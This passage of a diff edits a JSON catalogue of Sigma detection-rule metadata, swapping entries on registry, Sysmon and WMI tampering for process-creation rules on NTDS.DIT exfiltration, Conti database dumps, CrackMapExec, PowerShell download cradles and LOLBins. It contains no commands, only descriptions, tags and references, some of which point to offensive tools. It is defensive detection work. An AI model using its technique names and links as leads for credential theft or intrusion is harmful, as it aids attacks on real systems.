- "creation_date": "2021/08/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_uac_bypass_winsat.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/hfiref0x/UACME",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002"
- ]
- },
- "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853",
- "value": "UAC Bypass Abusing Winsat Path Parsing - Registry"
- },
- {
- "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)",
- "meta": {
- "author": "Christian Burkard",
- "creation_date": "2021/08/23",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_uac_bypass_wmp.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/hfiref0x/UACME",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002"
- ]
- },
- "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93",
- "value": "UAC Bypass Using Windows Media Player - Registry"
- },
- {
- "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/03/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_vbs_payload_stored.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.001"
- ]
- },
- "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f",
- "value": "VBScript Payload Stored in Registry"
- },
- {
- "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.",
- "meta": {
- "author": "oscd.community, Natalia Shornikova",
- "creation_date": "2020/10/13",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_wab_dllpath_reg_change.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml",
- "https://twitter.com/Hexacorn/status/991447379864932352",
- "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml"
+ "https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml"
 ],
 "tags": [
 "attack.defense_evasion",
 "attack.t1218"
 ]
 },
- "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb",
- "value": "Execution DLL of Choice Using WAB.EXE"
+ "uuid": "727454c0-d851-48b0-8b89-385611ab0704",
+ "value": "Lolbin Unregmp2.exe Use As Proxy"
 },
 {
- "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials",
+ "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration",
 "meta": {
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
- "creation_date": "2019/09/12",
+ "author": "Florian Roth",
+ "creation_date": "2022/03/11",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "registry_set_wdigest_enable_uselogoncredential.yml",
+ "filename": "proc_creation_win_susp_ntds.yml",
 "level": "high",
- "logsource.category": "registry_set",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- 
"https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html",
- "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ]
- },
- "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc",
- "value": "Wdigest Enable UseLogonCredential"
- },
- {
- "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry",
- "meta": {
- "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali",
- "creation_date": "2022/08/01",
- "falsepositive": [
- "Administrator actions"
- ],
- "filename": "registry_set_windows_defender_tamper.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
- "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263",
- "value": "Disable Windows Defender Functionalities Via Registry Keys"
- },
- {
- "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the 
other users\n",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/09",
- "falsepositive": [
- "Legitmate use of the multi session functionality"
- ],
- "filename": "registry_set_winlogon_allow_multiple_tssessions.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96",
- "value": "Winlogon AllowMultipleTSSessions Enable"
- },
- {
- "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/12/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_winlogon_notify_key.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.004"
- ]
- },
- "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88",
- "value": "Winlogon Notify Key Logon Persistence"
- },
- {
- "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process",
- "meta": {
- "author": 
"Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "regsitry_set_natural_language_persistence.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://persistence-info.github.io/Data/naturallanguage6.html",
- "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/regsitry_set_natural_language_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8",
- "value": "Add DLLPathOverride Entry For Persistence"
- },
- {
- "description": "Detects Accessing to lsass.exe by Powershell",
- "meta": {
- "author": "oscd.community, Natalia Shornikova",
- "creation_date": "2020/10/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "sysmon_accessing_winapi_in_powershell_credentials_dumping.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml"
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
+ "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1",
+ "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
+ "https://github.com/zcgonvh/NTDSDumpEx",
+ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
+ "https://pentestlab.blog/tag/ntds-dit/",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml"
 ],
 "tags": [
 "attack.credential_access",
- "attack.t1003.001"
+ "attack.t1003.003"
 ]
 },
- "uuid": "3f07b9d1-2082-4c56-9277-613a621983cc",
- "value": "Accessing WinAPI in PowerShell for Credentials Dumping"
+ "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08",
+ "value": "Suspicious Process Patterns NTDS.DIT Exfil"
 },
 {
- "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration",
+ "description": "Detects a command used by conti to dump database",
 "meta": {
 "author": "frack113",
- "creation_date": "2022/01/12",
- "falsepositive": [
- "Legitimate administrative action"
- ],
- "filename": "sysmon_config_modification.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77",
- "value": "Sysmon Configuration Change"
- },
- {
- "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/06/04",
- "falsepositive": [
- "Legitimate administrative action"
- ],
- "filename": "sysmon_config_modification_error.yml",
- "level": "high",
- "logsource.category": "sysmon_error",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564"
- ]
- },
- "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8",
- "value": "Sysmon Configuration Error"
- },
- {
- "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/06/04",
- "falsepositive": [
- "Legitimate administrative action"
- ],
- "filename": "sysmon_config_modification_status.yml",
- "level": "high",
- "logsource.category": "sysmon_status",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564"
- ]
- },
- "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744",
- "value": "Sysmon Configuration Modification"
- },
- {
- "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.",
- "meta": {
- "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga",
- "creation_date": "2020/10/12",
+ "creation_date": "2021/08/16",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "sysmon_dcom_iertutil_dll_hijack.yml",
- "level": "critical",
- "logsource.category": "No established category",
+ "filename": "proc_creation_win_conti_sqlcmd.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_dcom_iertutil_dll_hijack.yml"
+ "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
+ "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
+ "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml"
 ],
 "tags": [
- "attack.lateral_movement",
- "attack.t1021.002",
- "attack.t1021.003"
+ "attack.collection",
+ "attack.t1005"
 ]
 },
- "uuid": "e554f142-5cf3-4e55-ace9-a1b59e0def65",
- "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon"
+ "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b",
+ "value": "Conti Backup Database"
 },
 {
- "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set",
+ "description": "Detects attackers using tooling with bad opsec defaults e.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.",
 "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/16",
+ "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard",
+ "creation_date": "2020/10/23",
 "falsepositive": [
 "Unlikely"
 ],
- "filename": "sysmon_file_block_exe.yml",
+ "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml",
 "level": "high",
- "logsource.category": "file_block",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2",
- "value": "Sysmon Blocked Executable"
- },
- {
- "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.",
- "meta": {
- "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S",
- "creation_date": "2022/01/25",
- "falsepositive": [
- "There are no known false positives at this time"
- ],
- "filename": "sysmon_process_hollowing.yml",
- "level": "high",
- "logsource.category": "process_tampering",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20",
- "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml"
+ 
"https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
+ "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/",
+ "https://www.cobaltstrike.com/help-opsec",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool",
+ "https://twitter.com/CyberRaiju/status/1251492025678983169",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml"
 ],
 "tags": [
 "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055.012"
+ "attack.t1218.011"
 ]
 },
- "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd",
- "value": "Sysmon Process Hollowing Detection"
+ "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329",
+ "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments"
 },
 {
- "description": "Detects creation of WMI event subscription persistence method",
+ "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report",
 "meta": {
- "author": "Tom Ueltschi (@c_APT_ure)",
- "creation_date": "2019/01/12",
+ "author": "Florian Roth, Tim Shelton",
+ "creation_date": "2019/10/02",
 "falsepositive": [
- "Exclude legitimate (vetted) use of WMI event subscription in your network"
+ "Unlikely"
 ],
- "filename": "sysmon_wmi_event_subscription.yml",
- "level": "medium",
- "logsource.category": "wmi_event",
+ "filename": "proc_creation_win_apt_bluemashroom.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml"
+ 
"https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml"
 ],
 "tags": [
- "attack.persistence",
- "attack.t1546.003"
+ "attack.defense_evasion",
+ "attack.t1218.010"
 ]
 },
- "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297",
- "value": "WMI Event Subscription"
+ "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0",
+ "value": "BlueMashroom DLL Load"
 },
 {
- "description": "Detects suspicious encoded payloads in WMI Event Consumers",
+ "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.",
 "meta": {
 "author": "Florian Roth",
- "creation_date": "2021/09/01",
+ "creation_date": "2022/02/25",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "sysmon_wmi_susp_encoded_scripts.yml",
+ "filename": "proc_creation_win_susp_crackmapexec_flags.yml",
 "level": "high",
- "logsource.category": "wmi_event",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/RiccardoAncarani/LiquidSnake",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml"
+ "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz",
+ "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject",
+ "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local",
+ "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml"
 ],
- "tags": [
- "attack.execution",
- "attack.t1047",
- "attack.persistence",
- "attack.t1546.003"
- ]
+ "tags": "No established tags"
 },
- "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b",
- "value": "Suspicious Encoded 
Scripts in a WMI Consumer"
+ "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c",
+ "value": "CrackMapExec Command Line Flags"
 },
 {
- "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers",
+ "description": "Use \">\" to redicrect information in commandline",
 "meta": {
- "author": "Florian Roth, Jonhnathan Ribeiro",
- "creation_date": "2019/04/15",
+ "author": "frack113",
+ "creation_date": "2022/01/22",
 "falsepositive": [
- "Legitimate administrative scripts"
+ "Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment"
 ],
- "filename": "sysmon_wmi_susp_scripting.yml",
- "level": "high",
- "logsource.category": "wmi_event",
+ "filename": "proc_creation_win_cmd_redirect.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/",
- "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19",
- "https://github.com/RiccardoAncarani/LiquidSnake",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml"
+ "https://ss64.com/nt/syntax-redirection.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1082"
+ ]
+ },
+ "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a",
+ "value": "Redirect Output in CommandLine"
+ },
+ {
+ "description": "Adversaries may abuse Visual Basic (VB) for execution",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/02",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_cscript_vbs.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml"
 ],
 "tags": [
 "attack.execution",
 "attack.t1059.005"
 ]
 },
- "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0",
- "value": "Suspicious Scripting in a WMI Consumer"
+ "uuid": "23250293-eed5-4c39-b57a-841c8933a57d",
+ "value": "Cscript Visual Basic Script Execution"
+ },
+ {
+ "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/02/28",
+ "falsepositive": [
+ "Software installers that pull packages from remote systems and execute them"
+ ],
+ "filename": "proc_creation_win_powershell_download_patterns.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70",
+ "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275",
+ "value": "Suspicious PowerShell Download and Execute Pattern"
+ },
+ {
+ "description": "Detects the execution of SecurityXploded Tools",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2018/12/19",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_hack_secutyxploded.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://securityxploded.com/",
+ 
"https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1555"
+ ]
+ },
+ "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a",
+ "value": "SecurityXploded Tool"
+ },
+ {
+ "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/09/14",
+ "falsepositive": [
+ "Legitimate usage of the passwords by users via commandline (should be discouraged)",
+ "Other currently unknown false positives"
+ ],
+ "filename": "proc_creation_win_weak_or_abused_passwords.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution"
+ ]
+ },
+ "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4",
+ "value": "Weak or Abused Passwords In CLI"
+ },
+ {
+ "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/12/04",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_hack_sysmoneop.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ 
"logsource.product": "windows",
+ "refs": [
+ "https://github.com/Wh04m1001/SysmonEoP",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml"
+ ],
+ "tags": [
+ "cve.2022.41120",
+ "attack.t1068",
+ "attack.privilege_escalation"
+ ]
+ },
+ "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9",
+ "value": "SysmonEOP Hack Tool"
+ },
+ {
+ "description": "Detects python spawning a pretty tty",
+ "meta": {
+ "author": "Nextron Systems",
+ "creation_date": "2022/06/03",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_python_pty_spawn.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d",
+ "value": "Python Spawning Pretty TTY on Windows"
+ },
+ {
+ "description": "Detects the use of Replace.exe which can be used to replace file with another file",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/03/06",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_lolbin_replace.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Replace/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
+ },
+ "uuid": "9292293b-8496-4715-9db6-37028dcda4b3",
+ "value": "Replace.exe Usage"
+ },
+ {
+ "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation",
+ "meta": {
+ "author": "oscd.community, @redcanary, Zach Stanford @svch0st",
+ "creation_date": "2020/10/08",
+ "falsepositive": [
+ "Administrators or Power users may remove their shares via cmd line"
+ ],
+ "filename": "proc_creation_win_susp_mounted_share_deletion.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1070.005"
+ ]
+ },
+ "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896",
+ "value": "Mounted Share Deleted"
+ },
+ {
+ "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe",
+ "meta": {
+ "author": "A. 
Sungurov , oscd.community",
+ "creation_date": "2020/10/12",
+ "falsepositive": [
+ "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts",
+ "Legit usage of scripts"
+ ],
+ "filename": "proc_creation_win_lolbin_pcwrun.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/",
+ "https://twitter.com/pabraeken/status/991335019833708544",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218",
+ "attack.execution"
+ ]
+ },
+ "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc",
+ "value": "Indirect Command Execution By Program Compatibility Wizard"
+ },
+ {
